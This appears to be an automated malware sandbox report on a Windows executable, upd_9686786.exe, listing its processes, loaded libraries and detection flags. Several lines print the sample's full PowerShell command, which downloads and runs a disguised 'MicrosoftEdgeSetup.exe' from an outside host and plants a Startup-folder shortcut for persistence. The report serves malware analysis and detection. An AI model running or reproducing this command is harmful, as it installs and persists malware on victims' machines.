Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8636:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4684:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4684:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8636:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qpsfeg15.nww.ps1Jump to behavior
Source: upd_9686786.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\upd_9686786.exe "C:\Users\user\Desktop\upd_9686786.exe"
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c systeminfo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: unknownProcess created: C:\Users\user\Desktop\upd_9686786.exe "C:\Users\user\Desktop\upd_9686786.exe"
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c systeminfo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c systeminfoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c systeminfoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
Source: C:\Windows\System32\systeminfo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: tuygh.lnk.2.drLNK file: ..\..\..\..\..\..\..\Desktop\upd_9686786.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: upd_9686786.exeStatic PE information: certificate valid
Source: upd_9686786.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: upd_9686786.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ion.pdbS]K source: powershell.exe, 00000009.00000002.30279686077.00000215F4476000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.30276312197.0000020DF2D7E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?t.Automation.pdb+ source: powershell.exe, 00000009.00000002.30279975334.00000215F44BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000009.00000002.30279975334.00000215F44BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System32\wshom.ocxb.pdb^ source: powershell.exe, 00000009.00000002.30279975334.00000215F44BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb6.1.4.1.311. source: powershell.exe, 00000009.00000002.30274860324.0000020DF2CF4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdbb source: powershell.exe, 00000002.00000002.30012245368.00000177764AA000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"Jump to behavior
Source: upd_9686786.exeStatic PE information: real checksum: 0x209e2 should be: 0x1d80b
Source: C:\Users\user\Desktop\upd_9686786.exeCode function: 0_2_00007FF76E651000 push rdx; ret 0_2_00007FF76E65101F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC94BCADA2 pushad ; retf 2_2_00007FFC94BCADB1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC94BCD6FD push ebx; retn 0009h2_2_00007FFC94BCD79A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC94BC7C1E push eax; retf 2_2_00007FFC94BC7C2D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC94BC841E push eax; ret 2_2_00007FFC94BC842D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC94BC7BEE pushad ; retf 2_2_00007FFC94BC7C1D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC94BC83EE pushad ; ret 2_2_00007FFC94BC841D

Boot Survival

barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree).
